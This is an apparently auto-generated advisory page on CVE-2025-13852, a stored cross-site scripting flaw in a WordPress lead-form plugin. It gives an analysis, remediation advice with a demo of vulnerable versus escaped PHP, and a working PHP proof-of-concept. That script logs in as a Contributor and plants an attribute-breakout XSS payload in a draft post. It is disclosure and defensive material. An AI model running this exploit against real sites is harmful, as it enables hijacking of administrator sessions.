Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-13852: Debt.com Business in a Box <= 4.1.0 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes (debtcom-business-in-a-box)

Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 4.1.0
Patched Version
Disclosed January 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13852 (metadata-based):

This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Debt.com Business in a Box WordPress plugin. The vulnerability exists in the plugin’s ‘lead_form’ shortcode handler, specifically within its ‘configuration’ parameter processing. Attackers with Contributor-level permissions or higher can inject malicious scripts into pages or posts. These scripts execute when other users view the compromised content. The CVSS 3.1 score of 6.4 (Medium severity) reflects the network attack vector, low attack complexity, and the requirement for authenticated access with low privileges.

Atomic Edge research infers the root cause is improper neutralization of user-supplied input before web page generation (CWE-79). The vulnerability description explicitly cites insufficient input sanitization and output escaping on the ‘configuration’ parameter. Without access to the source code, we cannot confirm the exact vulnerable function. The likely vulnerable code pattern involves a shortcode callback function that receives the ‘configuration’ attribute, fails to sanitize it with `sanitize_text_field` or similar, and later outputs the value without proper escaping via `esc_attr` or `wp_kses`.

Exploitation requires an authenticated attacker with at least Contributor-level access. The attacker creates or edits a post or page and inserts the plugin’s shortcode with a malicious ‘configuration’ attribute; the shortcode syntax would resemble `[lead_form configuration="malicious_payload"]`. Two WordPress details shape the attack. First, Contributors cannot publish, so the draft or pending post has to be previewed or published by an Editor or Administrator, and that higher-privileged reviewer is the natural victim. Second, Contributors lack the `unfiltered_html` capability, so WordPress runs `wp_kses_post` over the content on save and strips `<script>` tags; if the value is echoed into an HTML attribute, as the analysis infers, a payload that survives KSES typically breaks out of that attribute (a closing quote followed by an event-handler attribute) rather than carrying a tag of its own. Anything else that can write post content, such as a compromised higher-privileged account or a separate vulnerability, can plant the same shortcode. The payload executes in the victim’s browser when they view a page containing it.

Effective remediation requires both input validation and context-appropriate output escaping. The plugin should normalise the ‘configuration’ attribute on receipt (`shortcode_atts` with a safe default, then `sanitize_text_field`) and escape it for the exact context it is written into: `esc_attr` inside an HTML attribute, `esc_html` for text between elements, `esc_js` or `wp_json_encode` if it is emitted into inline JavaScript, and `wp_kses_post` only where a limited HTML subset is intentionally allowed. `wp_kses_post` is not a substitute for `esc_attr`: it permits quote characters, so a KSES-filtered value can still break out of an attribute. A patch would modify the shortcode handler to apply these measures before any front-end or admin output.
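The pattern described above, as an added illustration that is not the plugin’s code: only the `lead_form` tag and the `configuration` attribute come from the advisory, while the handler names, the `data-config` attribute the value is written into, and the small stand-ins for the WordPress core functions are assumptions. It places the unescaped attribute write beside the hardened version and runs under plain `php` on the command line; inside WordPress the stand-ins are skipped and the real core functions are used.

```php
<?php
// Added illustration for CVE-2025-13852 (not the plugin's code). The shortcode tag
// 'lead_form' and the 'configuration' attribute come from the advisory; everything
// else (function names, the data-config attribute, the stand-ins) is assumed.

// Stand-ins so the file runs under `php` on the CLI. Inside WordPress the core
// functions already exist and these definitions are skipped.
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $defaults, $atts): array {
        $atts = is_array($atts) ? $atts : [];
        return array_merge($defaults, array_intersect_key($atts, $defaults));
    }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $s): string {
        // Core also strips invalid octets and line breaks; tag stripping and
        // whitespace normalisation are enough for this demo.
        return trim(preg_replace('/\s+/', ' ', strip_tags($s)));
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable pattern the analysis infers: the raw attribute value is written into
// an HTML attribute with no sanitization and no escaping.
function ae_demo_lead_form_vulnerable($atts): string {
    $atts = shortcode_atts(['configuration' => 'default'], $atts);
    return '<div class="lead-form" data-config="' . $atts['configuration'] . '"></div>';
}

// Hardened: validate on the way in, escape for the attribute context on the way out.
function ae_demo_lead_form_fixed($atts): string {
    $atts   = shortcode_atts(['configuration' => 'default'], $atts);
    $config = sanitize_text_field((string) $atts['configuration']);
    return '<div class="lead-form" data-config="' . esc_attr($config) . '"></div>';
}

// In a plugin the fixed handler is registered the same way the vulnerable one was:
// add_shortcode('lead_form', 'ae_demo_lead_form_fixed');

// Constructed payloads. The first is what wp_kses_post() strips from a Contributor's
// post on save; the second carries no tag, survives KSES, and is the realistic input.
$payloads = [
    'script tag'         => '<script>alert(document.domain)</script>',
    'attribute breakout' => '" onmouseover="alert(document.domain)" x="',
];

foreach ($payloads as $label => $payload) {
    echo "--- {$label} ---\n";
    echo 'vulnerable: ' . ae_demo_lead_form_vulnerable(['configuration' => $payload]) . "\n";
    echo 'fixed:      ' . ae_demo_lead_form_fixed(['configuration' => $payload]) . "\n";
}
```

In the breakout case `sanitize_text_field` leaves the value untouched, since there is no tag to strip; it is `esc_attr` that turns the quote into `&quot;` and keeps the value inside `data-config`. That is why escaping at the output context, not input filtering alone, is the fix.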

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the compromised page. This can lead to session hijacking, account takeover, defacement, or redirection to malicious sites. Attackers can perform actions as the victim user, including creating administrative accounts if a site administrator views the page. The stored nature of the attack increases its impact, as the payload persists and affects all subsequent visitors until removed.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-13852 - Debt.com Business in a Box <= 4.1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes
/**
 * Proof of Concept for CVE-2025-13852.
 * This script demonstrates exploitation by an authenticated Contributor+ user.
 * Assumptions:
 * 1. The target site has the vulnerable plugin (<=4.1.0) active.
 * 2. Valid Contributor-level credentials are available.
 * 3. The attacker can create or edit posts/pages.
 * 4. The 'lead_form' shortcode is registered and functional.
 * 5. post-new.php serves the classic editor form. The block editor saves through
 *    the REST API and does not expose the nonce and post_ID fields read below.
 */

$target_url = 'http://vulnerable-wordpress-site.com'; // CONFIGURE THIS
$username   = 'contributor_user';                     // CONFIGURE THIS
$password   = 'contributor_password';                 // CONFIGURE THIS
$cookie_jar = __DIR__ . '/cookies.txt';

// Payload. Contributors lack the unfiltered_html capability, so WordPress runs
// wp_kses_post() over the content on save and strips <script> tags before the
// shortcode is ever rendered. A payload with no HTML tag survives KSES; the one
// below assumes the attribute value is echoed inside a double-quoted HTML
// attribute (the context the analysis infers) and breaks out of it.
$xss_payload = '" onmouseover="alert(`Atomic Edge XSS Test: ${document.domain}`)" x="';
// Tag-based variant, usable only with an account that has unfiltered_html (Editor+):
// $xss_payload = '<script>alert(`Atomic Edge XSS Test: ${document.domain}`)</script>';

$ch = curl_init();
curl_setopt_array($ch, array(
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_COOKIEJAR      => $cookie_jar,
    CURLOPT_COOKIEFILE     => $cookie_jar,
    CURLOPT_FOLLOWLOCATION => true,
));

// Step 1: Fetch the login form first. wp-login.php sets wordpress_test_cookie and
// rejects a login POST that does not send it back ("Cookies are blocked").
$login_url = $target_url . '/wp-login.php';
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
curl_exec($ch);

// Step 2: Authenticate; the auth cookies are written to the cookie jar.
$login_data = array(
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => '1'
);
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$login_response = curl_exec($ch);
if ($login_response === false) {
    die('cURL error during login: ' . curl_error($ch) . "\n");
}

// Step 3: Open post-new.php. WordPress creates an auto-draft and embeds its ID and an
// update-post_<ID> nonce in the form; post.php requires both on save.
$create_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $create_post_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$post_page = curl_exec($ch);

// Simplified extraction; adjust the patterns if the admin markup differs.
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $post_page, $nonce_matches);
preg_match('/name="post_ID" value="(\d+)"/', $post_page, $id_matches);
$nonce   = $nonce_matches[1] ?? '';
$post_id = $id_matches[1] ?? '';

if ($nonce === '' || $post_id === '') {
    die("Failed to extract nonce or post ID. Authentication may have failed, or the block editor is active.\n");
}

// Step 4: Save the auto-draft as a draft containing the malicious shortcode.
// Contributors can create posts but not publish them, so it stays a draft.
// The attribute is single-quoted so the double quotes inside the payload remain
// part of the 'configuration' value when shortcode_parse_atts() splits the tag.
$save_post_url = $target_url . '/wp-admin/post.php';
$post_data = array(
    'post_title'       => 'Atomic Edge Test Post',
    'content'          => "[lead_form configuration='" . $xss_payload . "']",
    'post_status'      => 'draft',
    'post_type'        => 'post',
    '_wpnonce'         => $nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php',
    'action'           => 'editpost',
    'post_ID'          => $post_id
);

curl_setopt($ch, CURLOPT_URL, $save_post_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$save_response = curl_exec($ch);

// Step 5: post.php redirects back to the editor with message=10, rendered as
// "Post draft updated."; FOLLOWLOCATION means that page is what we received.
if (strpos($save_response, 'Post draft updated.') !== false || strpos($save_response, 'Post published.') !== false) {
    echo "Exploit likely successful. Post ID {$post_id} contains the malicious shortcode.\n";
    echo "Preview the draft (wp-admin/post.php?post={$post_id}&action=edit, then Preview) as a higher-privileged user to trigger the payload.\n";
} else {
    echo "Post creation may have failed. Check permissions, the nonce, and the editor in use.\n";
}

curl_close($ch);
?>
